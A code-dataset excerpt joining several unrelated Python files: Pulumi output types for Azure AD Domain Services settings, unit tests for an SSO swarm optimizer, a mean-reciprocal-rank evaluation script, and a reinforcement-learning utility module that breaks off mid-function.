suggest = "additional_recipients"
elif key == "notifyDcAdmins":
suggest = "notify_dc_admins"
elif key == "notifyGlobalAdmins":
suggest = "notify_global_admins"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceNotifications. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceNotifications.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceNotifications.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
additional_recipients: Optional[Sequence[str]] = None,
notify_dc_admins: Optional[bool] = None,
notify_global_admins: Optional[bool] = None):
"""
:param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain.
:param bool notify_dc_admins: Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain.
:param bool notify_global_admins: Whether to notify all Global Administrators when there are alerts in the managed domain.
"""
if additional_recipients is not None:
pulumi.set(__self__, "additional_recipients", additional_recipients)
if notify_dc_admins is not None:
pulumi.set(__self__, "notify_dc_admins", notify_dc_admins)
if notify_global_admins is not None:
pulumi.set(__self__, "notify_global_admins", notify_global_admins)
@property
@pulumi.getter(name="additionalRecipients")
def additional_recipients(self) -> Optional[Sequence[str]]:
"""
A list of additional email addresses to notify when there are alerts in the managed domain.
"""
return pulumi.get(self, "additional_recipients")
@property
@pulumi.getter(name="notifyDcAdmins")
def notify_dc_admins(self) -> Optional[bool]:
"""
Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_dc_admins")
@property
@pulumi.getter(name="notifyGlobalAdmins")
def notify_global_admins(self) -> Optional[bool]:
"""
Whether to notify all Global Administrators when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_global_admins")
@pulumi.output_type
class ServiceSecureLdap(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "pfxCertificate":
suggest = "pfx_certificate"
elif key == "pfxCertificatePassword":
suggest = "pfx_certificate_password"
elif key == "certificateExpiry":
suggest = "certificate_expiry"
elif key == "certificateThumbprint":
suggest = "certificate_thumbprint"
elif key == "externalAccessEnabled":
suggest = "external_access_enabled"
elif key == "publicCertificate":
suggest = "public_certificate"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceSecureLdap. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceSecureLdap.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceSecureLdap.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
enabled: bool,
pfx_certificate: str,
pfx_certificate_password: str,
certificate_expiry: Optional[str] = None,
certificate_thumbprint: Optional[str] = None,
external_access_enabled: Optional[bool] = None,
public_certificate: Optional[str] = None):
"""
:param bool enabled: Whether to enable secure LDAP for the managed domain. Defaults to `false`.
:param str pfx_certificate: The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file).
:param str pfx_certificate_password: The password to use for decrypting the PKCS#12 bundle (PFX file).
:param bool external_access_enabled: Whether to enable external access to LDAPS over the Internet. Defaults to `false`.
"""
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "pfx_certificate", pfx_certificate)
pulumi.set(__self__, "pfx_certificate_password", pfx_certificate_password)
if certificate_expiry is not None:
pulumi.set(__self__, "certificate_expiry", certificate_expiry)
if certificate_thumbprint is not None:
pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint)
if external_access_enabled is not None:
pulumi.set(__self__, "external_access_enabled", external_access_enabled)
if public_certificate is not None:
pulumi.set(__self__, "public_certificate", public_certificate)
@property
@pulumi.getter
def enabled(self) -> bool:
"""
Whether to enable secure LDAP for the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="pfxCertificate")
def pfx_certificate(self) -> str:
"""
The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file).
"""
return pulumi.get(self, "pfx_certificate")
@property
@pulumi.getter(name="pfxCertificatePassword")
def pfx_certificate_password(self) -> str:
"""
The password to use for decrypting the PKCS#12 bundle (PFX file).
"""
return pulumi.get(self, "pfx_certificate_password")
@property
@pulumi.getter(name="certificateExpiry")
def certificate_expiry(self) -> Optional[str]:
return pulumi.get(self, "certificate_expiry")
@property
@pulumi.getter(name="certificateThumbprint")
def certificate_thumbprint(self) -> Optional[str]:
return pulumi.get(self, "certificate_thumbprint")
@property
@pulumi.getter(name="externalAccessEnabled")
def external_access_enabled(self) -> Optional[bool]:
"""
Whether to enable external access to LDAPS over the Internet. Defaults to `false`.
"""
return pulumi.get(self, "external_access_enabled")
@property
@pulumi.getter(name="publicCertificate")
def public_certificate(self) -> Optional[str]:
return pulumi.get(self, "public_certificate")
@pulumi.output_type
class ServiceSecurity(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ntlmV1Enabled":
suggest = "ntlm_v1_enabled"
elif key == "syncKerberosPasswords":
suggest = "sync_kerberos_passwords"
elif key == "syncNtlmPasswords":
suggest = "sync_ntlm_passwords"
elif key == "syncOnPremPasswords":
suggest = "sync_on_prem_passwords"
elif key == "tlsV1Enabled":
suggest = "tls_v1_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceSecurity. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceSecurity.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceSecurity.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ntlm_v1_enabled: Optional[bool] = None,
sync_kerberos_passwords: Optional[bool] = None,
sync_ntlm_passwords: Optional[bool] = None,
sync_on_prem_passwords: Optional[bool] = None,
tls_v1_enabled: Optional[bool] = None):
"""
:param bool ntlm_v1_enabled: Whether to enable legacy NTLM v1 support. Defaults to `false`.
:param bool sync_kerberos_passwords: Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`.
:param bool sync_ntlm_passwords: Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`.
:param bool sync_on_prem_passwords: Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`.
:param bool tls_v1_enabled: Whether to enable legacy TLS v1 support. Defaults to `false`.
"""
if ntlm_v1_enabled is not None:
pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled)
if sync_kerberos_passwords is not None:
pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords)
if sync_ntlm_passwords is not None:
pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords)
if sync_on_prem_passwords is not None:
pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords)
if tls_v1_enabled is not None:
pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled)
@property
@pulumi.getter(name="ntlmV1Enabled")
def ntlm_v1_enabled(self) -> Optional[bool]:
"""
Whether to enable legacy NTLM v1 support. Defaults to `false`.
"""
return pulumi.get(self, "ntlm_v1_enabled")
@property
@pulumi.getter(name="syncKerberosPasswords")
def sync_kerberos_passwords(self) -> Optional[bool]:
"""
Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_kerberos_passwords")
@property
@pulumi.getter(name="syncNtlmPasswords")
def sync_ntlm_passwords(self) -> Optional[bool]:
"""
Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_ntlm_passwords")
@property
@pulumi.getter(name="syncOnPremPasswords")
def sync_on_prem_passwords(self) -> Optional[bool]:
"""
Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`.
"""
return pulumi.get(self, "sync_on_prem_passwords")
@property
@pulumi.getter(name="tlsV1Enabled")
def tls_v1_enabled(self) -> Optional[bool]:
"""
Whether to enable legacy TLS v1 support. Defaults to `false`.
"""
return pulumi.get(self, "tls_v1_enabled")
@pulumi.output_type
class GetServiceNotificationResult(dict):
def __init__(__self__, *,
additional_recipients: Sequence[str],
notify_dc_admins: bool,
notify_global_admins: bool):
"""
:param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain.
        :param bool notify_dc_admins: Whether members of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain.
:param bool notify_global_admins: Whether all Global Administrators are notified when there are alerts in the managed domain.
"""
pulumi.set(__self__, "additional_recipients", additional_recipients)
pulumi.set(__self__, "notify_dc_admins", notify_dc_admins)
pulumi.set(__self__, "notify_global_admins", notify_global_admins)
@property
@pulumi.getter(name="additionalRecipients")
def additional_recipients(self) -> Sequence[str]:
"""
A list of additional email addresses to notify when there are alerts in the managed domain.
"""
return pulumi.get(self, "additional_recipients")
@property
@pulumi.getter(name="notifyDcAdmins")
def notify_dc_admins(self) -> bool:
"""
        Whether members of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_dc_admins")
@property
@pulumi.getter(name="notifyGlobalAdmins")
def notify_global_admins(self) -> bool:
"""
Whether all Global Administrators are notified when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_global_admins")
@pulumi.output_type
class GetServiceReplicaSetResult(dict):
def __init__(__self__, *,
domain_controller_ip_addresses: Sequence[str],
external_access_ip_address: str,
id: str,
location: str,
service_status: str,
subnet_id: str):
"""
:param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the replica set, typically two.
:param str external_access_ip_address: The publicly routable IP address for the domain controllers in the replica set.
:param str id: The ID of the Domain Service.
:param str location: The Azure location in which the replica set resides.
:param str service_status: The current service status for the replica set.
:param str subnet_id: The ID of the subnet in which the replica set resides.
"""
pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses)
pulumi.set(__self__, "external_access_ip_address", external_access_ip_address)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "location", location)
pulumi.set(__self__, "service_status", service_status)
pulumi.set(__self__, "subnet_id", subnet_id)
@property
@pulumi.getter(name="domainControllerIpAddresses")
def domain_controller_ip_addresses(self) -> Sequence[str]:
"""
A list of subnet IP addresses for the domain controllers in the replica set, typically two.
"""
return pulumi.get(self, "domain_controller_ip_addresses")
@property
@pulumi.getter(name="externalAccessIpAddress")
def external_access_ip_address(self) -> str:
"""
The publicly routable IP address for the domain controllers in the replica set.
"""
return pulumi.get(self, "external_access_ip_address")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the Domain Service.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> str:
"""
The Azure location in which the replica set resides.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="serviceStatus")
def service_status(self) -> str:
"""
The current service status for the replica set.
"""
return pulumi.get(self, "service_status")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The ID of the subnet in which the replica set resides.
"""
return pulumi.get(self, "subnet_id")
@pulumi.output_type
class GetServiceSecureLdapResult(dict):
def __init__(__self__, *,
certificate_expiry: str,
certificate_thumbprint: str,
enabled: bool,
external_access_enabled: bool,
public_certificate: str):
"""
:param bool enabled: Whether secure LDAP is enabled for the managed domain.
        :param bool external_access_enabled: Whether external access to LDAPS over the Internet is enabled.
"""
pulumi.set(__self__, "certificate_expiry", certificate_expiry)
pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint)
pulumi.set(__self__, "enabled", enabled)
pulumi.set(__self__, "external_access_enabled", external_access_enabled)
pulumi.set(__self__, "public_certificate", public_certificate)
@property
@pulumi.getter(name="certificateExpiry")
def certificate_expiry(self) -> str:
return pulumi.get(self, "certificate_expiry")
@property
@pulumi.getter(name="certificateThumbprint")
def certificate_thumbprint(self) -> str:
return pulumi.get(self, "certificate_thumbprint")
@property
@pulumi.getter
def enabled(self) -> bool:
"""
Whether secure LDAP is enabled for the managed domain.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="externalAccessEnabled")
def external_access_enabled(self) -> bool:
"""
        Whether external access to LDAPS over the Internet is enabled.
"""
return pulumi.get(self, "external_access_enabled")
@property
@pulumi.getter(name="publicCertificate")
def public_certificate(self) -> str:
return pulumi.get(self, "public_certificate")
@pulumi.output_type
class GetServiceSecurityResult(dict):
def __init__(__self__, *,
ntlm_v1_enabled: bool,
sync_kerberos_passwords: bool,
sync_ntlm_passwords: bool,
sync_on_prem_passwords: bool,
tls_v1_enabled: bool):
"""
:param bool ntlm_v1_enabled: Whether legacy NTLM v1 support is enabled.
:param bool sync_kerberos_passwords: Whether Kerberos password hashes are synchronized to the managed domain.
:param bool sync_ntlm_passwords: Whether NTLM password hashes are synchronized to the managed domain.
:param bool sync_on_prem_passwords: Whether on-premises password hashes are synchronized to the managed domain.
:param bool tls_v1_enabled: Whether legacy TLS v1 support is enabled.
"""
pulumi.set(__self__, "ntlm_v1_enabled", ntlm_v1_enabled)
pulumi.set(__self__, "sync_kerberos_passwords", sync_kerberos_passwords)
pulumi.set(__self__, "sync_ntlm_passwords", sync_ntlm_passwords)
pulumi.set(__self__, "sync_on_prem_passwords", sync_on_prem_passwords)
pulumi.set(__self__, "tls_v1_enabled", tls_v1_enabled)
@property
@pulumi.getter(name="ntlmV1Enabled")
def ntlm_v1_enabled(self) -> bool:
"""
Whether legacy NTLM v1 support is enabled.
"""
return pulumi.get(self, "ntlm_v1_enabled")
@property
@pulumi.getter(name="syncKerberosPasswords")
def sync_kerberos_passwords(self) -> bool:
"""
Whether Kerberos password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_kerberos_passwords")
@property
@pulumi.getter(name="syncNtlmPasswords")
def sync_ntlm_passwords(self) -> bool:
"""
Whether NTLM password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_ntlm_passwords")
@property
@pulumi.getter(name="syncOnPremPasswords")
def sync_on_prem_passwords(self) -> bool:
"""
Whether on-premises password hashes are synchronized to the managed domain.
"""
return pulumi.get(self, "sync_on_prem_passwords")
@property
@pulumi.getter(name="tlsV1Enabled")
def tls_v1_enabled(self) -> bool:
"""
Whether legacy TLS v1 support is enabled.
"""
return pulumi.get(self, "tls_v1_enabled")
|
tests/opytimizer/optimizers/swarm/test_sso.py
|
anukaal/opytimizer
| 528 |
61827
|
import numpy as np
from opytimizer.optimizers.swarm import sso
from opytimizer.spaces import search
def test_sso_params():
params = {
'C_w': 0.1,
'C_p': 0.4,
'C_g': 0.9
}
new_sso = sso.SSO(params=params)
assert new_sso.C_w == 0.1
assert new_sso.C_p == 0.4
assert new_sso.C_g == 0.9
def test_sso_params_setter():
new_sso = sso.SSO()
try:
new_sso.C_w = 'a'
except:
new_sso.C_w = 0.1
try:
new_sso.C_w = -1
except:
new_sso.C_w = 0.1
assert new_sso.C_w == 0.1
try:
new_sso.C_p = 'b'
except:
new_sso.C_p = 0.4
try:
new_sso.C_p = 0.05
except:
new_sso.C_p = 0.4
assert new_sso.C_p == 0.4
try:
new_sso.C_g = 'c'
except:
new_sso.C_g = 0.9
try:
new_sso.C_g = 0.35
except:
new_sso.C_g = 0.9
assert new_sso.C_g == 0.9
def test_sso_compile():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
try:
new_sso.local_position = 1
except:
new_sso.local_position = np.array([1])
assert new_sso.local_position == np.array([1])
def test_sso_evaluate():
def square(x):
return np.sum(x**2)
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.evaluate(search_space, square)
def test_sso_update():
search_space = search.SearchSpace(n_agents=10, n_variables=2,
lower_bound=[0, 0], upper_bound=[10, 10])
new_sso = sso.SSO()
new_sso.compile(search_space)
new_sso.update(search_space)
|
utils/eval_mrr.py
|
BaoLocPham/hum2song
| 108 |
61831
|
import argparse
import csv
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from modules.metric import mean_reciprocal_rank
def main(csv_path):
acc = 0
num = 0
with open(csv_path, "r") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count > 0:
hum_id = row[0].split(".")[0]
preds = []
for col in row[1:]:
preds.append(str(col))
print(hum_id, mean_reciprocal_rank(preds, str(hum_id)))
acc += mean_reciprocal_rank(preds, str(hum_id))
num += 1
line_count += 1
print(f'Processed {line_count} lines.')
return acc / num
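# Assumed CSV layout (inferred from the parsing above, not a documented format):
# a header row, then rows whose first column is the hum file name (its stem,
# e.g. "0001" from "0001.wav", is the ground-truth song id) and whose remaining
# columns are the ranked predicted song ids:
#   hum,pred_1,pred_2,...
#   0001.wav,0375,0001,0100,...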
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--csv_path", type=str, required=True, help="path to predict csv")
args = parser.parse_args()
mrr = main(args.csv_path)
print("-----------------------------")
print(f"MRR: {mrr}")
|
rl/util.py
|
AsimKhan2019/OpenAI-Lab
| 340 |
61832
|
<filename>rl/util.py
import argparse
import collections
import inspect
import json
import logging
import multiprocessing as mp
import numpy as np
import re
import sys
import zipfile
from datetime import datetime, timedelta
from os import path, listdir, environ, getpid
from textwrap import wrap
PARALLEL_PROCESS_NUM = mp.cpu_count()
TIMESTAMP_REGEX = r'(\d{4}_\d{2}_\d{2}_\d{6})'
SPEC_PATH = path.join(path.dirname(__file__), 'spec')
COMPONENT_LOCKS = json.loads(
open(path.join(SPEC_PATH, 'component_locks.json')).read())
LOCK_HEAD_REST_SIG = {
# signature list of [head, rest] in component lock
'mutex': [[0, 0], [1, 1]],
'subset': [[0, 0], [1, 0], [1, 1]],
}
# parse_args to add flag
parser = argparse.ArgumentParser(description='Set flags for functions')
parser.add_argument("-b", "--blind",
help="dont render graphics",
action="store_const",
dest="render",
const=False,
default=True)
parser.add_argument("-d", "--debug",
help="activate debug log",
action="store_const",
dest="loglevel",
const=logging.DEBUG,
default=logging.INFO)
parser.add_argument("-e", "--experiment",
help="specify experiment to run",
action="store",
type=str,
nargs='?',
dest="experiment",
default="dev_dqn")
parser.add_argument("-p", "--param_selection",
help="run parameter selection if present",
action="store_true",
dest="param_selection",
default=False)
parser.add_argument("-q", "--quiet",
help="change log to warning level",
action="store_const",
dest="loglevel",
const=logging.WARNING,
default=logging.INFO)
parser.add_argument("-t", "--times",
help="number of times session is run",
action="store",
nargs='?',
type=int,
dest="times",
default=1)
parser.add_argument("-x", "--max_episodes",
help="manually set environment max episodes",
action="store",
nargs='?',
type=int,
dest="max_epis",
default=-1)
args = parser.parse_args([]) if environ.get('CI') else parser.parse_args()
# Goddam python logger
logger = logging.getLogger(__name__)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s'))
logger.setLevel(args.loglevel)
logger.addHandler(handler)
logger.propagate = False
environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # mute tf warnings on optimized setup
def check_equal(iterator):
'''check if list contains all the same elements'''
iterator = iter(iterator)
try:
first = next(iterator)
except StopIteration:
return True
return all(first == rest for rest in iterator)
def check_lock(lock_name, lock, experiment_spec):
'''
refer to rl/spec/component_locks.json
check a spec's component lock using binary signatures
e.g. head = problem (discrete)
rest = [Agent, Policy] (to be discrete too)
first check if rest all has the same signature, i.e. same set
then check pair [bin_head, bin_rest] in valid_lock_sig_list
as specified by the lock's type
'''
lock_type = lock['type']
valid_lock_sig_list = LOCK_HEAD_REST_SIG[lock_type]
lock_head = lock['head']
bin_head = (experiment_spec[lock_head] in lock[lock_head])
bin_rest_list = []
for k, v_list in lock.items():
if k in experiment_spec and k != lock_head:
bin_rest_list.append(experiment_spec[k] in v_list)
# rest must all have the same signature
rest_equal = check_equal(bin_rest_list)
if not rest_equal:
logger.warn(
'All components need to be of the same set, '
'check component lock "{}" and your spec "{}"'.format(
lock_name, experiment_spec['experiment_name']))
bin_rest = bin_rest_list[0]
lock_sig = [bin_head, bin_rest]
lock_valid = lock_sig in valid_lock_sig_list
if not lock_valid:
logger.warn(
'Component lock violated: "{}", spec: "{}"'.format(
lock_name, experiment_spec['experiment_name']))
return lock_valid
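# Usage sketch with a hypothetical lock spec (illustrative only; the real locks
# live in rl/spec/component_locks.json):
#   lock = {
#       "type": "mutex",
#       "head": "problem",
#       "problem": ["CartPole-v0"],
#       "Agent": ["DQN"],
#       "Policy": ["EpsilonGreedyPolicy"],
#   }
#   check_lock("discrete_only", lock, EXPERIMENT_SPECS["dev_dqn"])
# bin_head is True iff the spec's head component appears in the head list; every
# other component named in the lock must share one True/False signature, and the
# pair [bin_head, bin_rest] must appear in LOCK_HEAD_REST_SIG[lock["type"]].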
def check_component_locks(experiment_spec):
'''
check the spec components for all locks
to ensure no lock is violated
refer to rl/spec/component_locks.json
'''
for lock_name, lock in COMPONENT_LOCKS.items():
check_lock(lock_name, lock, experiment_spec)
return
# import and safeguard the PROBLEMS, EXPERIMENT_SPECS with checks
def import_guard_asset():
PROBLEMS = json.loads(open(path.join(SPEC_PATH, 'problems.json')).read())
EXPERIMENT_SPECS = {}
spec_files = [spec_json for spec_json in listdir(
SPEC_PATH) if spec_json.endswith('experiment_specs.json')]
for filename in spec_files:
specs = json.loads(open(path.join(SPEC_PATH, filename)).read())
EXPERIMENT_SPECS.update(specs)
REQUIRED_PROBLEM_KEYS = [
'GYM_ENV_NAME', 'SOLVED_MEAN_REWARD',
'MAX_EPISODES', 'REWARD_MEAN_LEN']
REQUIRED_SPEC_KEYS = [
'problem', 'Agent', 'HyperOptimizer',
'Memory', 'Optimizer', 'Policy', 'PreProcessor', 'param']
for problem_name, problem in PROBLEMS.items():
assert all(k in problem for k in REQUIRED_PROBLEM_KEYS), \
'{} needs all REQUIRED_PROBLEM_KEYS'.format(
problem_name)
for experiment_name, spec in EXPERIMENT_SPECS.items():
assert all(k in spec for k in REQUIRED_SPEC_KEYS), \
'{} needs all REQUIRED_SPEC_KEYS'.format(experiment_name)
EXPERIMENT_SPECS[experiment_name]['experiment_name'] = experiment_name
check_component_locks(spec) # check component_locks.json
if 'param_range' not in EXPERIMENT_SPECS[experiment_name]:
continue
param_range = EXPERIMENT_SPECS[experiment_name]['param_range']
for param_key, param_val in param_range.items():
if isinstance(param_val, list):
param_range[param_key] = sorted(param_val)
elif isinstance(param_val, dict):
pass
else:
assert False, \
'param_range value must be list or dict: {}.{}:{}'.format(
experiment_name, param_key, param_val)
EXPERIMENT_SPECS[experiment_name]['param_range'] = param_range
return PROBLEMS, EXPERIMENT_SPECS
PROBLEMS, EXPERIMENT_SPECS = import_guard_asset()
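# Rough shape of one experiment spec (hypothetical values; only the key set is
# taken from REQUIRED_SPEC_KEYS above, 'param_range' is optional and its list
# values get sorted):
#   {
#       "problem": "CartPole-v0",
#       "Agent": "DQN",
#       "HyperOptimizer": "GridSearch",
#       "Memory": "LinearMemory",
#       "Optimizer": "AdamOptimizer",
#       "Policy": "EpsilonGreedyPolicy",
#       "PreProcessor": "NoPreProcessor",
#       "param": {"lr": 0.01},
#       "param_range": {"lr": [0.001, 0.01, 0.1]},
#   }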
def log_self(subject):
max_info_len = 300
info = '{}, param: {}'.format(
subject.__class__.__name__,
to_json(subject.__dict__))
trunc_info = (
info[:max_info_len] + '...' if len(info) > max_info_len else info)
logger.debug(trunc_info)
def wrap_text(text):
return '\n'.join(wrap(text, 60))
def make_line(line='-'):
if environ.get('CI'):
return
columns = 80
line_str = line*int(columns)
return line_str
def log_delimiter(msg, line='-'):
delim_msg = '''\n{0}\n{1}\n{0}\n\n'''.format(
make_line(line), msg)
logger.info(delim_msg)
def log_trial_delimiter(trial, action):
log_delimiter('{} Trial #{}/{} on PID {}:\n{}'.format(
action, trial.trial_num, trial.num_of_trials,
getpid(), trial.trial_id), '=')
def log_session_delimiter(sess, action):
log_delimiter(
'{} Session #{}/{} of Trial #{}/{} on PID {}:\n{}'.format(
action, sess.session_num, sess.num_of_sessions,
sess.trial.trial_num, sess.trial.num_of_trials,
getpid(), sess.session_id))
def timestamp():
'''timestamp used for filename'''
timestamp_str = '{:%Y_%m_%d_%H%M%S}'.format(datetime.now())
assert re.search(TIMESTAMP_REGEX, timestamp_str)
return timestamp_str
def timestamp_elapse(s1, s2):
'''calculate the time elapsed between timestamps from s1 to s2'''
FMT = '%Y_%m_%d_%H%M%S'
delta_t = datetime.strptime(s2, FMT) - datetime.strptime(s1, FMT)
return str(delta_t)
def timestamp_elapse_to_seconds(s1):
a = datetime.strptime(s1, '%H:%M:%S')
secs = timedelta(hours=a.hour, minutes=a.minute, seconds=a.second).seconds
return secs
# own custom sorted json serializer, cuz python
def to_json(o, level=0):
INDENT = 2
SPACE = " "
NEWLINE = "\n"
ret = ""
if isinstance(o, dict):
ret += "{" + NEWLINE
comma = ""
for k in sorted(o.keys()):
v = o[k]
ret += comma
comma = ",\n"
ret += SPACE * INDENT * (level+1)
ret += '"' + str(k) + '":' + SPACE
ret += to_json(v, level + 1)
ret += NEWLINE + SPACE * INDENT * level + "}"
elif isinstance(o, str):
ret += '"' + o + '"'
elif isinstance(o, list) or isinstance(o, tuple):
ret += "[" + ",".join([to_json(e, level+1) for e in o]) + "]"
elif isinstance(o, bool):
ret += "true" if o else "false"
elif isinstance(o, int):
ret += str(o)
elif isinstance(o, float):
ret += '%.7g' % o
elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.integer):
ret += "[" + ','.join(map(str, o.flatten().tolist())) + "]"
elif isinstance(o, np.ndarray) and np.issubdtype(o.dtype, np.inexact):
ret += "[" + \
','.join(map(lambda x: '%.7g' % x, o.flatten().tolist())) + "]"
elif o is None:
ret += 'null'
elif hasattr(o, '__class__'):
ret += '"' + o.__class__.__name__ + '"'
else:
raise TypeError(
"Unknown type '%s' for json serialization" % str(type(o)))
return ret
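# Example (illustrative): to_json({"b": 2, "a": "x"}) yields the sorted,
# 2-space-indented string '{\n  "a": "x",\n  "b": 2\n}'.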
# format object and its properties into printable dict
def format_obj_dict(obj, keys):
if isinstance(obj, dict):
return to_json(
{k: obj.get(k) for k in keys if obj.get(k) is not None})
else:
return to_json(
{k: getattr(obj, k, None) for k in keys
if getattr(obj, k, None) is not None})
# cast dict to have flat values (int, float, str)
def flat_cast_dict(d):
for k in d:
v = d[k]
if not isinstance(v, (int, float)):
d[k] = str(v)
return d
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
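# Example (illustrative): flatten_dict({"a": {"b": 1, "c": 2}, "d": 3})
# returns {"a_b": 1, "a_c": 2, "d": 3}.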
def get_module(GREF, dot_path):
# get module from globals() by string dot_path
path_arr = dot_path.split('.')
# base level from globals
mod = GREF.get(path_arr.pop(0))
for deeper_path in path_arr:
mod = getattr(mod, deeper_path)
return mod
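# Example (illustrative): get_module(globals(), 'np.random.rand') resolves the
# dotted path against this module's globals and returns numpy.random.rand.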
def import_package_files(globals_, locals_, __file__):
'''
Dynamically import all the public attributes of the python modules in this
file's directory (the package directory) and return a list of their names.
'''
exports = []
# globals_, locals_ = globals(), locals()
package_path = path.dirname(__file__)
package_name = path.basename(package_path)
for filename in listdir(package_path):
modulename, ext = path.splitext(filename)
if modulename[0] != '_' and ext in ('.py', '.pyw'):
subpackage = '{}.{}'.format(
package_name, modulename) # pkg relative
module = __import__(subpackage, globals_, locals_, [modulename])
modict = module.__dict__
names = (modict['__all__'] if '__all__' in modict else
[name for name in
modict if inspect.isclass(modict[name])]) # all public
exports.extend(names)
globals_.update((name, modict[name]) for name in names)
return exports
def clean_id_str(id_str):
return id_str.split('/').pop().split('.').pop(0)
def parse_trial_id(id_str):
c_id_str = clean_id_str(id_str)
if re.search(TIMESTAMP_REGEX, c_id_str):
name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str)
if len(name_time_trial) == 3:
return c_id_str
else:
return None
else:
return None
def parse_experiment_id(id_str):
c_id_str = clean_id_str(id_str)
if re.search(TIMESTAMP_REGEX, c_id_str):
name_time_trial = re.split(TIMESTAMP_REGEX, c_id_str)
name_time_trial.pop()
experiment_id = ''.join(name_time_trial)
return experiment_id
else:
return None
def parse_experiment_name(id_str):
c_id_str = clean_id_str(id_str)
experiment_id = parse_experiment_id(c_id_str)
if experiment_id is None:
experiment_name = c_id_str
else:
experiment_name = re.sub(TIMESTAMP_REGEX, '', experiment_id).strip('-')
assert experiment_name in EXPERIMENT_SPECS, \
'{} not in EXPERIMENT_SPECS'.format(experiment_name)
return experiment_name
def load_data_from_trial_id(id_str):
experiment_id = parse_experiment_id(id_str)
trial_id = parse_trial_id(id_str)
data_filename = './data/{}/{}.json'.format(experiment_id, trial_id)
try:
data = json.loads(open(data_filename).read())
except (FileNotFoundError, json.JSONDecodeError):
data = None
return data
def load_data_array_from_experiment_id(id_str):
# to load all ./data files for a series of trials
experiment_id = parse_experiment_id(id_str)
data_path = './data/{}'.format(experiment_id)
trial_id_array = [
f for f in listdir(data_path)
if (path.isfile(path.join(data_path, f)) and
f.startswith(experiment_id) and
f.endswith('.json'))
]
return list(filter(None, [load_data_from_trial_id(trial_id)
for trial_id in trial_id_array]))
def save_experiment_data(data_df, trial_id):
experiment_id = parse_experiment_id(trial_id)
filedir = './data/{0}'.format(experiment_id)
filename = '{0}_analysis_data.csv'.format(experiment_id)
filepath = '{}/{}'.format(filedir, filename)
data_df.round(6).to_csv(filepath, index=False)
# zip the csv and best trial json for upload to PR
zipfile.ZipFile(filepath+'.zip', mode='w').write(
filepath, arcname=filename)
trial_filename = data_df.loc[0, 'trial_id'] + '.json'
trial_filepath = '{}/{}'.format(filedir, trial_filename)
zipfile.ZipFile(trial_filepath+'.zip', mode='w').write(
